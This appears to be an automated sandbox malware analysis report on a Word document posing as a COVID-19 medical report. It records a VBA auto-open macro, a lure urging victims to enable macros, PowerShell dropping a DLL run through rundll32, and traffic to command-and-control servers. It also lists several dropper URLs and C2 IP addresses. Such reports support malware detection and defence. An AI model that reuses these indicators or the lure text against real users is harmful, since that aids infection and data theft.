Source: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global trafficDNS query: name: remediis.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.2.81.171:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49168 -> 71.72.196.159:80
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: https://www.starlingtechs.com/GNM/
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
Source: global trafficHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknownTCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /wp-includes/w/ HTTP/1.1Host: avadnansahin.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: remediis.com
Source: unknownHTTP traffic detected: POST /fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/ HTTP/1.1DNT: 0Referer: 69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/Content-Type: multipart/form-data; boundary=-------------------HZtvsb4iqah9tnyW329User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://avadnansahin.com/wp-includes/w/
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://hellas-darmstadt.de/cgi-bin/ZSoo/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://solicon.us/allam-cycle-1c4gn/f5z/
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: http://www.riparazioni-radiotv.com/softaculous/DZz/
Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://remediis.com
Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://remediis.com/t/gm2X/
Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmpString found in binary or memory: https://remediis.comp
Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmpString found in binary or memory: https://www.starlingtechs.com/GNM/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 5321
Source: unknownProcess created: Commandline size = 5220
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5220
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Giyrh\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00272E05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E1F1
Source: XP-9743 Medical report COVID-19.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Kyl0l3rqw280c6ssa, Function Document_open
Source: XP-9743 Medical report COVID-19.docOLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.evad.winDOC@26/7@2/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-9743 Medical report COVID-19.docJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmpJump to behavior
Source: XP-9743 Medical report COVID-19.docOLE indicator, Word Document stream: true
Source: XP-9743 Medical report COVID-19.docOLE document summary: title field not present or empty
Source: XP-9743 Medical report COVID-19.docOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exeConsole Write: ............d........................... .V.......V.....................H...............#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exeConsole Write: ............d...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v.....,......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v.... -......0.................j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v.....9......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x.j...............u.............}..v....x:......0.................j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............M..j......................u.............}..v.... h......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............M..j..... u...............u.............}..v.....h......0...............H.j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......................u.............}..v.... .......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......................u.............}..v.... .......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............}..j....`Kj...............u.............}..v.....%......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....&................u.............}..v.... '......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....8+......0................Hj.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j.....+................u.............}..v....p,......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.4.............}..v.....0......0................Hj.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....81................u.............}..v.....1......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............}..j....`Kj...............u.............}..v.....8......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....89................u.............}..v.....9......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....@......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8A................u.............}..v.....A......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....H......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8I................u.............}..v.....I......0................Hj.............................
